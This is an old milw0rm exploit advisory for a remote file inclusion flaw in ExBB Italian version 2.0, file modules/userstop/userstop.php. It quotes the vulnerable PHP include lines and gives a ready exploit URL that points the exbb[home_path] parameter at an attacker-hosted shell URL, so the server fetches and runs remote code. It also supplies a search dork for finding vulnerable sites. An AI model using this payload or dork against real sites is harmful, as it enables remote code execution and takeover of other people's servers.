37 lines
No EOL
1.4 KiB
Text
37 lines
No EOL
1.4 KiB
Text
#==============================================================================================
|
|
#ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://www.exbb.altervista.org/
|
|
#
|
|
#Version : 2.0
|
|
#
|
|
#================================================================================================
|
|
#Bug in : smodules/userstop/userstop.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
# <?
|
|
# include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');
|
|
# include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')
|
|
#
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL.COM?
|
|
#
|
|
#DOrk : in Yahoo.it =====> "Powered by ExBB "
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-08-29] |